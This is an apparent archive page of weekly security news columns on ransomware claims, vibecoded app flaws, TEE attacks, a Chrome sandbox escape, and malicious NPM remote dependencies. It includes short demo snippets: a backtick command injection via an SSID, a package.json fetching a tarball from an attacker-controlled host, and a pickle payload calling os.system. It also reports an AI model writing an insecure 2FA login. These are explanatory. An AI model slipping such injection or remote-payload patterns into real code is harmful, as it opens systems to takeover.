This Week In Security: Bogus Ransom, WordPress Plugins, And KASLR

There’s another ransomware story this week, but this one comes with a special twist. If you’ve followed this column for long, you’re aware that ransomware has evolved beyond just encrypting files. Perhaps we owe a tiny bit of gratitude to ransomware gangs for convincing everyone that backups are important. The downside to companies getting their backups in order is that these criminals are turning to other means to extort payment from victims. Namely, exfiltrating files and releasing them to the public if the victim doesn’t pay up. And this is the situation in which the Akira ransomware actors claim to have caught Apache’s OpenOffice project.

There’s just one catch. Akira is threatening to release 23 GB of stolen documents, which include employee information — and the Apache Software Foundation says those documents don’t exist. OpenOffice hasn’t received a ransom demand and can’t find any evidence of a breach. It seems likely that Akira has hit some company, just not one that’s part of the Apache Software Foundation. Possibly it’s an organization that heavily uses OpenOffice, or even provides some level of support for that application. There is one more wrinkle here.

Since Apache OpenOffice is an open source software project, none of our contributors are paid employees for the project or the foundation…

Continue reading “This Week In Security: Bogus Ransom, WordPress Plugins, And KASLR”

This Week In Security: Vibecoding, Router Banning, And Remote Dynamic Dependencies

Vibecoding. What could possibly go wrong? That’s what [Kevin Joensen] of Baldur wondered, and to find out he asked Anthropic’s Sonnet 4.5 to build a secure login with Two Factor Authentication (2FA). And to the LLM’s credit, it built the app as requested. [Kevin] took a peek under the hood to see how well the security was handled, and it wasn’t great.

Up first, the Flask app doesn’t have any rate-limiting for guessing that time-based 2FA code. A 6-digit time-based 2FA code only works if an attacker can’t try all the possibilities before a given code expires. So what does a vibecoder do once this has been noticed? Ask the LLM to fix it, of course. Here we take a slightly different approach, prompting the AI to double-check its own work: “Is there any security features missing in 2fa verify step?” The answer is impressive:

Great question! Yes, there are several critical security features missing from the 2FA verification step. Let me highlight the most important ones:

🚨 Critical Security Issues

1. No Rate Limiting (MOST CRITICAL)

But the critical question: can it properly fix its own mistake? The AI adds the flask-limiter library and chooses 10 attempts per minute, which is a bit loose, but not unreasonable. There’s still an issue, though: those attempts are limited by IP address instead of by user account. All it takes to bypass that rate limiting is a pool of IP addresses.
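For a sense of what the better fix looks like, here’s a minimal sketch of a Flask 2FA endpoint rate-limited with flask-limiter, keyed on the submitted username rather than the client IP. This is not [Kevin]’s actual app; the route, form fields, and the verify_totp() helper are hypothetical stand-ins.

```python
from flask import Flask, request, abort
from flask_limiter import Limiter

app = Flask(__name__)

# Key each rate-limit bucket on the account under attack, so a pool of
# source IPs doesn't buy the attacker any extra guesses.
def account_key():
    return request.form.get("username", request.remote_addr)

limiter = Limiter(key_func=account_key, app=app)

@app.route("/2fa/verify", methods=["POST"])
@limiter.limit("5 per minute")  # far too few attempts to brute-force a 6-digit code
def verify_2fa():
    username = request.form["username"]
    code = request.form["code"]
    if not verify_totp(username, code):  # hypothetical TOTP check
        abort(401)
    return "ok"
```

The same library applied per-IP is roughly what the LLM reached for; the meaningful difference is entirely in the key function.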

This experiment starts to go off the rails, as [Kevin] continues to prompt the LLM to look for more problems in its code, and it begins to hallucinate vulnerabilities, while not fixing the actual problem. LLMs are not up to writing secure code, even with handholding.

But surely the problem of LLMs making security mistakes isn’t a real-world problem, right? Right? Researchers at Escape did a survey of 5,600 vibecoded web applications, and found 2,000 vulnerabilities. Caveat Vibetor.

“Secure” Enclave

A few weeks ago we talked about Battering RAM and Wiretap — attacks against Trusted Execution Environments (TEEs). These two attacks defeated trusted computing technologies, but were limited to DDR4 memory. Now we’re back with TEE-fail, a similar attack that works against DDR5 systems.

This is your reminder that very few security solutions hold up against a determined attacker with physical access. Intel, AMD, and Nvidia all explicitly exclude this sort of physical attack from their TEE threat models. The problem is that no one seemed to be paying attention to that part of the documentation, with companies ranging from Cloudflare to Signal getting this detail wrong in their marketing.

Banning TP-Link

News has broken that the US government is considering banning the sale of new TP-Link network equipment, calling the devices a national security risk.

I have experience with TP-Link hardware: Years ago I installed dozens of TL-WR841 WiFi routers in small businesses as they upgraded from DSL to cable internet. Even then, I didn’t trust the firmware that shipped on these routers, but flashed OpenWRT to each of them before installing. Fun fact, if you go far enough back in time, you can find my emails on the OpenWRT mailing list, testing and even writing OpenWRT support for new TP-Link hardware revisions.

From that experience, I can tell you that TP-Link isn’t special. They have terrible firmware just like every other embedded device manufacturer. For a while, you could run arbitrary code on TP-Link devices by putting it inside backticks when naming the WiFi network. It wasn’t an intentional backdoor; it was just sloppy code. I’m reasonably certain that this observation still holds true. TP-Link isn’t malicious, but their products still have security problems. And at this point they’re the largest vendor of cheap networking gear with a Chinese lineage. Put another way, they’re in the spotlight due to their own success.
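For the curious, here’s a minimal sketch of how that class of bug works. This is illustrative Python, not TP-Link’s actual firmware code: the point is simply that splicing an untrusted SSID into a shell command lets backtick command substitution run whatever the attacker typed.

```python
import subprocess

ssid = "`touch /tmp/pwned`"  # attacker-chosen WiFi network name

# Sloppy: the SSID is interpolated into a shell command, so the shell
# expands the backticks and runs `touch /tmp/pwned` as a side effect.
subprocess.run(f'logger "New SSID: {ssid}"', shell=True)

# Safer: pass arguments as a list, so nothing is shell-interpreted.
subprocess.run(["logger", f"New SSID: {ssid}"])
```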

There is one other element that’s important to note here. Even though TP-Link Systems is now a US company, there is still a significant TP-Link engineering force in China, and TP-Link may be subject to the reporting requirements of China’s Network Product Security legislation. Put simply, this law requires that when companies discover vulnerabilities, they must disclose the details to a particular Chinese government agency. It seems likely that this is the primary concern in the minds of US regulators: that threat actors cooperating with the Chinese government are getting advance notice of these flaws. The ban is still just a proposal, and no action has been taken on it yet.

Sandbox Escape

In March there was an interesting one-click exploit that was launched via phishing links in emails. Researchers at Kaspersky managed to grab a copy of the malware chain, and discovered the Chrome vulnerability used. And it turns out it involves a rather novel problem. Windows has a pair of APIs to get handles for the current thread and process, and they have a performance hack built-in: Instead of returning a full handle, they can return -1 for the current process and -2 for the current thread.

Now, when sandboxed code tries to use one of these pseudo handles, Chrome does check for the -1 value, but not for the other special values, meaning that the “sandboxed” code can make calls against the current thread’s pseudo handle. That is enough to run code gadgets and ultimately execute code outside the sandbox. Google has issued a patch for this particular problem, and not long after, Firefox was patched for the same issue.
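Those pseudo handles are the values returned by the Windows GetCurrentProcess() and GetCurrentThread() APIs, and it’s easy to see the sentinel values for yourself. Here’s a tiny Windows-only sketch using Python’s ctypes; it just prints the constants, and doesn’t reproduce any of the sandbox-escape details from the write-up.

```python
import ctypes

kernel32 = ctypes.windll.kernel32  # Windows only

# These APIs don't hand back real handles. They return sentinel values
# that the kernel resolves to "the calling process/thread" at use time.
kernel32.GetCurrentProcess.restype = ctypes.c_ssize_t
kernel32.GetCurrentThread.restype = ctypes.c_ssize_t

print(kernel32.GetCurrentProcess())  # -1, the process pseudo handle
print(kernel32.GetCurrentThread())   # -2, the thread pseudo handle
```

A filter that only screens for the -1 process pseudo handle waves the -2 thread pseudo handle straight through, which is exactly the gap Chrome’s sandbox had.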

NPM and Remote Dynamic Dependencies

It seems like hardly a week goes by that we aren’t talking about another NPM problem. This time it’s a new way to sneak malware onto the repository, in the form of Remote Dynamic Dependencies (RDD). In a way, that term could apply to all NPM dependencies, but in this case it refers to dependencies hosted somewhere else on the web, outside the NPM registry. And that’s the hook. When NPM reviews the package, it doesn’t do anything malicious. Then, once real users start installing it, server-side logic on the attacker’s host dynamically swaps those remote dependencies out for malicious versions.
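NPM’s package format makes this easy to express, since a dependency’s version specifier can be an arbitrary tarball URL. Here’s a hypothetical package.json showing the shape of the trick; the package names and URL are made up.

```json
{
  "name": "innocuous-helper",
  "version": "1.2.3",
  "dependencies": {
    "left-padder": "https://cdn.attacker-controlled.example/left-padder-2.0.1.tgz"
  }
}
```

Whether that URL serves a clean tarball or a malicious one is entirely up to the server on the other end, which can change its answer per request.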

Installing one of these packages ends with a script scooping up all the data it can and exfiltrating it to the attacker’s command and control system. While there isn’t an official response from NPM yet, it seems inevitable that NPM packages will be disallowed from using these arbitrary HTTP/HTTPS dependencies. There are some indicators of compromise available from Koi.

Bits and Bytes

Python deserialization with Pickle has always been a bit scary. Several times we’ve covered vulnerabilities that have their root in this particular brand of unsafe deserialization. There’s a new approach that just may achieve safer pickle handling, but it’s a public challenge at this point. It can be thought of as real-time auditing for anything unsafe during deserialization. It’s not ready for prime time, but it’s great to see the out-of-the-box thinking here.
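As a refresher on why pickle keeps showing up in these stories, here’s a self-contained sketch of the classic problem: any object can define __reduce__, and the unpickler will happily call whatever callable it names during deserialization. The payload below only runs a harmless echo, but it could be anything.

```python
import os
import pickle

class Demo:
    def __reduce__(self):
        # Instructs the unpickler to call os.system(...) while loading.
        return (os.system, ("echo this ran during unpickling",))

payload = pickle.dumps(Demo())
pickle.loads(payload)  # the command runs here, before any sanity checking
```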

This may be the first time I’ve seen a remote exploit via a 404 page. But in this case, the 404 includes the page that was requested, and the back-end code that injects that string into the 404 page is vulnerable to XML injection. While it doesn’t directly allow for code execution, this approach can result in data leaks and server-side request forgery.

And finally, there was a sketchy leak that may reveal which mobile devices the Cellebrite toolkit can successfully compromise. The story is that [rogueFed] sneaked into a Teams meeting to listen in and grab screenshots. The real surprise here is that GrapheneOS is more resistant to the Cellebrite toolkit than even the stock firmware on phones like the Pixel 9. This leak should be taken with a sizable grain of salt, but it may turn out to be legitimate.

This Week In Security: Court Orders, GlassWorm, TARmageddon, And It Was DNS

This week, a US federal court has ruled that NSO Group is no longer allowed to use Pegasus spyware against users of WhatsApp. And for their trouble, NSO was also fined $4 million. It’s unclear how much this ruling will actually change NSO’s behavior, as it intentionally stopped short of applying to foreign governments.

There may be an unexpected source of leverage the US courts can exert over NSO, with the news that American investors are acquiring the company. Among the requirements of the ruling is that NSO cannot reverse engineer WhatsApp code, cannot create new WhatsApp accounts, and must delete any existing WhatsApp code in their possession. Whether this actually happens remains to be seen.

Continue reading “This Week In Security: Court Orders, GlassWorm, TARmageddon, And It Was DNS”

This Week In Security: F5, SonicWall, And The End Of Windows 10

F5 is unintentionally dabbling in releasing the source code behind their BIG-IP networking gear, announcing this week that an unknown threat actor had access to their internal vulnerability and code tracking systems. This security breach was discovered on August 9th, and in the time since, F5 has engaged with CrowdStrike, Mandiant, and NCC Group to review what happened.

So far it appears that the worst result is access to unreleased vulnerabilities in the F5 knowledge management system. This means that any unpatched vulnerabilities were effectively 0-days, though the latest set of patches for the BIG-IP system has fixed those flaws. There aren’t any reports of those vulnerabilities being exploited in the wild, and F5 has stated that none of the leaked vulnerabilities were critical or allowed for remote exploitation.

Slightly more worrying is that this access included the product development environment. The problem there isn’t particularly the leak of the source code — one of the covered projects is NGINX, which is already open source software. The real danger is that changes could have been surreptitiously added to those codebases. The fact that NGINX is Open Source goes a long way to alleviate that danger, and when combined with the security built into tools like git, it seems very unlikely that malicious code could be sneaked into the NGINX public code base. A thorough review of the rest of the F5 codebases has similarly come up negative, and so far it looks like the supply-chain bullet has been dodged. Continue reading “This Week In Security: F5, SonicWall, And The End Of Windows 10”

This Week In Security: ID Breaches, Code Smell, And Poetic Flows

Discord had a data breach back on September 20th, via an outsourced support contractor. It seems it was a Zendesk instance that was accessed for 58 hours through a compromised contractor user account. There have been numbers thrown around by groups claiming to be behind the breach, like 1.6 terabytes of data downloaded, 5.5 million users affected, and 2.1 million photos of IDs.

Discord has pushed back on those numbers, stating that it’s about 70,000 IDs that were leaked, with no comment on the other claims. To their credit, Discord has steadfastly refused to pay any ransom. There’s an interesting question here: why were Discord users’ government-issued IDs on record with their accounts?

The answer is fairly simple: legal compliance. Governments around the world are beginning to require age verification from users. This often takes the form of a scan of valid ID, or even taking a picture of the user while holding the ID. There are many arguments about whether this is a good or bad development for the web, but it looks like ID age verification is going to be around for a while, and it’ll make data breaches more serious.

In similar news, Salesforce has announced that they won’t be paying any ransoms to the group behind the compromise of 39 different Salesforce customers. This campaign was performed by calling companies that use the Salesforce platform, and convincing the target to install a malicious app inside their Salesforce instance. Continue reading “This Week In Security: ID Breaches, Code Smell, And Poetic Flows”

This Week In Security: CVSS 0, Chwoot, And Not In The Threat Model

This week a reader sent me a story about a CVE in Notepad++, and something isn’t quite right. The story is a DLL hijack, a technique where a legitimate program’s Dynamic Link Library (DLL) is replaced with a malicious DLL. This can be used for very stealthy persistence as well as escalation of privilege. This one was assigned CVE-2025-56383, and given a CVSS score of 8.4.

The problem? Notepad++ doesn’t run as a privileged user, and the install defaults to the right permissions for the folder where the “vulnerable” DLL is installed. Or as pointed out in a GitHub issue on the Proof of Concept (PoC) code, why not just hijack the notepad++ executable?

This is key when evaluating a vulnerability write-up. What exactly is the write-up claiming? And what security boundary is actually being broken? The Common Weakness Enumeration (CWE) list can be useful here. This vulnerability is classified as CWE-427, an uncontrolled search path element — which isn’t actually what the vulnerability claims, and that’s another clue that something is amiss here. In reality this “vulnerability” applies to every application that uses a DLL: a CVSS 0.

Continue reading “This Week In Security: CVSS 0, Chwoot, And Not In The Threat Model”

This Week In Security: CVSS 4, OAuth, And ActiveMQ

We’ve talked a few times here about the issues with the CVSS system. We’ve seen CVE farming, where a moderate issue, or even a non-issue, gets assigned a ridiculously high CVSS score. There are times a minor problem in a library is a major problem in certain use cases, and not an issue at all in others. And with some of those issues in mind, let’s take a look at the fourth version of the Common Vulnerability Scoring System.

One of the first tweaks to cover is the de-emphasis of the base score. Version 3.1 did have optional metrics that were intended to temper the base score, but this revision beefs that idea up with Threat Metrics, Environmental Metrics, and Supplemental Metrics. These are an attempt to measure how likely it is that an exploit will actually be used. The various combinations have been given names: CVSS-B is just the base metric, CVSS-BT is the base and threat scores together, CVSS-BE is the mix of base and environmental metrics, and CVSS-BTE is the combination of all three.

Another new feature is multiple scores for a given vulnerability. A problem in a library is first considered in a worst-case scenario, and the initial base score is published with those caveats made clear. And then for each downstream program that uses that library, a new base score should be calculated to reflect the reality of that case. Continue reading “This Week In Security: CVSS 4, OAuth, And ActiveMQ”